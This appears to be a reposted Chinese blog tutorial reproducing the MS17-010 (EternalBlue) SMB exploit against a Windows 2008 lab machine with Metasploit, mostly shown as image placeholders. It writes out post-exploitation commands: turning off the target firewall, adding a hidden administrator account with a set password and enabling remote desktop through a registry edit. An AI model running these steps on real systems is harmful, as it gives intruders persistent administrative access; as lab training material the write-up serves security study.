漏洞复现-MS17-010(永恒之蓝)

漏洞介绍

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无

复现环境

攻击机:kali    IP:192.168.232.130
靶 机:windows 2008 IP:192.168.232.129
启动数据库:Msfdb start 或者 service postgresql start
启动数据库的话运行msf会更快,可开可不开,看自己心情

1、启动msfconsole

输入msfconsole
在这里插入图片描述

2、搜索ms17_010漏洞

在这里插入图片描述

3、用搜索模块对靶机进行漏洞扫描

在这里插入图片描述
在这里插入图片描述
存在漏洞

4、攻击

back,选择攻击模块
在这里插入图片描述
在这里插入图片描述
set payload :设置payload(有效载荷)
在这里插入图片描述
set lhost:设置攻击者IP
在这里插入图片描述
在这里插入图片描述
netsh advfirewall set allprofiles state off
关闭目标防火墙
在这里插入图片描述
在这里插入图片描述

5、后渗透

2008会检测密码复杂性,不能设弱口令密码
创建用户名密码 blue/!@#$1234qwe

C:\Windows\system32>net user blue !@#$1234qwe /add

在这里插入图片描述
将用户blue添加入管理组
C:\Windows\system32>net localgroup administrators blue /add
在这里插入图片描述
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
在这里插入图片描述
远程桌面连接
rdesktop 192.168.232.129:3389
在这里插入图片描述
在这里插入图片描述

发布了28 篇原创文章 · 获赞 4 · 访问量 1472

猜你喜欢

转载自blog.csdn.net/weixin_43870289/article/details/104627283
今日推荐